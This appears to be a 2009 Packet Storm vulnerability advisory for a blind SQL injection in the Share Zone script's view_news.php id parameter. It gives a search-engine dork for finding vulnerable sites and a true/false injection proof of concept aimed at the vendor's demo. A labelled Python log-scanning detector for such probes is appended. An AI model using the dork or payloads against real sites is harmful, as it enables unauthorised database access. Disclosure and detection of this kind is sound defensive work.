Share Zone SQL Injection

2009-09-22T00:00:00
ID PACKETSTORM:81552
Type packetstorm
Reporter OoN_Boy
Modified 2009-09-22T00:00:00

Description

                                        
`[x]========================================================================================================================================[x]  
| AntiSecurity[dot]org |  
[x]========================================================================================================================================[x]  
  
  
  
[x]========================================================================================================================================[x]  
| Title : Share Zone view_news.php?id= blind SQL injection vulnerability |  
| Software : Share Zone |  
| Vendor : http://www.vastal.com/ |  
| Demo : http://www.vastal.com/rapid/ |  
| Price : $200.00 |  
| Date : 23 September 2009 ( Indonesia ) |  
| Author : OoN_Boy |  
| Contact : oon.boy9@gmail.com |  
| Web : http://oonboy.info |  
| Blog : http://oonboy.blogspot.com |  
[x]========================================================================================================================================[x]  
  
  
  
  
[x]========================================================================================================================================[x]  
| Description : Create your own file hosting website with ease. The file hosting and sharing website is a new concept which allows|  
| users to share files for free and send large email attachments as well. Our script has all the features needed to|  
| run a rapidshare clone or a megaupload clone |  
[x]========================================================================================================================================[x]  
  
  
  
[x]========================================================================================================================================[x]  
| dork : inurl:view_news.php?id= "Maintained by Vastal I-Tech & Co." |  
[x]========================================================================================================================================[x]  
  
  
  
[x]========================================================================================================================================[x]  
| Exploit : http://localhost/[path]/view_news.php?id=[sql] |  
[x]========================================================================================================================================[x]  
  
  
  
  
[x]========================================================================================================================================[x]  
| Proof of concept : http://www.vastal.com/rapid/view_news.php?id=1+and+substring(@@version,1,1)=5 True |  
| http://www.vastal.com/rapid/view_news.php?id=1+and+substring(@@version,1,1)=4 False |  
[x]========================================================================================================================================[x]  
  
  
  
  
[x]========================================================================================================================================[x]  
| Greetz : antisecurity.org batamhacker.or.id |  
| h4ntu Vrs-hCk NoGe Paman zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va |  
| k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere |  
[x]========================================================================================================================================[x]  
  
  
  
  
[x]========================================================================================================================================[x]  
| Note : Please help to vote me in http://8.17.84.100/planyouradventour/profil_team.php?uid_group=1466598338 |  
[x]========================================================================================================================================[x]`
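
Detection sketch for the true/false probing shown in the proof of concept, added here as an example and not part of the original advisory: it scans web access logs for view_news.php requests whose id parameter is not a plain integer and marks the ones that append a boolean condition. The log lines, client addresses and response sizes are constructed, and the idea that the true and false pages differ in size is an assumption.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined log format (not from a real server).
SAMPLE_LOG = """\
203.0.113.7 - - [23/Sep/2009:10:01:02 +0700] "GET /rapid/view_news.php?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [23/Sep/2009:10:01:09 +0700] "GET /rapid/view_news.php?id=1+and+substring(@@version,1,1)=5 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [23/Sep/2009:10:01:11 +0700] "GET /rapid/view_news.php?id=1+and+substring(@@version,1,1)=4 HTTP/1.1" 200 1893 "-" "Mozilla/5.0"
198.51.100.4 - - [23/Sep/2009:10:02:30 +0700] "GET /rapid/view_news.php?id=12 HTTP/1.1" 200 4876 "-" "Mozilla/5.0"
198.51.100.4 - - [23/Sep/2009:10:02:41 +0700] "GET /rapid/view_news.php?id=1%20AND%20SUBSTRING(@@version,1,1)=5 HTTP/1.1" 200 5120 "-" "curl/7.19"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3}) (\d+|-)')
# Boolean condition appended to the numeric id, as in the advisory's true/false pair.
BOOLEAN_RE = re.compile(r'^\d+\s+(?:and|or)\s+.+(?:=|<|>|\blike\b)', re.I)

def find_suspect_requests(log_text, script="view_news.php"):
    """Return {client_ip: [(id_value, kind, status, size), ...]} for non-numeric ids."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, target, status, size = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/" + script):
            continue
        # parse_qs decodes both '+' and %20 to a space, so both encodings match.
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            if value.isdigit():
                continue  # legitimate article id
            kind = "boolean-blind" if BOOLEAN_RE.match(value) else "non-numeric"
            hits[ip].append((value, kind, int(status), size))
    return dict(hits)

def response_size_split(hits):
    """IPs whose boolean probes got differing body sizes: the true/false oracle is visible."""
    return sorted(ip for ip, rows in hits.items()
                  if len({size for _, kind, _, size in rows if kind == "boolean-blind"}) > 1)

if __name__ == "__main__":
    found = find_suspect_requests(SAMPLE_LOG)
    for ip, rows in found.items():
        for value, kind, status, size in rows:
            print(f"{ip}  {kind:13}  status={status} bytes={size}  id={value!r}")
    print("true/false size split seen from:", response_size_split(found))
```

Because the id is expected to be an integer, any hit from this scan also marks a request that server-side integer validation or a parameterized query would have neutralized.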